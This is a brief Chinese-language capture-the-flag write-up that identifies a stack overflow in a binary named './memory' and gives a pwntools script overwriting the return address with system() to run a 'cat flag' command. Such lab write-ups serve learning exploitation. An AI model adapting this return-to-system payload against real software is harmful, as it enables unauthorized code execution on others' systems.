存在溢出漏洞:
进行了逻辑判断,相等则输出good job!!!
从堆栈上看,s2在return地址下面。
整合上面,便于脚本如下:
from pwn import*
p = process('./memory')
system_addr = 0x08048440
catflag_addr = 0x080487E0
payload='A'*0x17 + p32(system_addr) + p32(0x080487E0) + p32(0x080487E0)
p.sendline(payload)
p.interactive()